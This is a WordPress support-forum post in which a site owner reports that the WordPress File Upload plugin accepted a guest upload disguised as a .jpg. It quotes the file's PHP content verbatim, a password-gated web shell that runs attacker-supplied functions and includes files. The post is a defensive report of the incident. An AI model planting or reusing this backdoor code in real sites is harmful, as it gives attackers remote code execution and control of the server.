Potentially serious security issue
-
Someone was able to use the WordPress File Upload plugin to upload a file to our site with the filename “wfu_widget_logo.jpg”. The file was not a .jpg as named, it contained the following PHP code:
“<?php extract($_REQUEST);if(md5($b)!=’9546d40688a5eaae1de839b1d3566e1a’){die();}$c($f, $a);include_once $f; ?>”
For unfathomable reasons, WordPress File Upload deposits any guest uploads into it’s own root folder (/wp-content/plugins/wp-file-upload/lib) and regardless of the file name if there’s PHP code there then at the very least it will cause an error that takes your site down if there’s a code error, which is what happened to us. Worst case that code will be executed, as clearly that attacker intended in this case.
If this is even a remote possibility under some basic wordpress configuration I would think it would warrant a giant warning when you install the plugin at the very least. Ideally there would be something to prevent this.
- The topic ‘Potentially serious security issue’ is closed to new replies.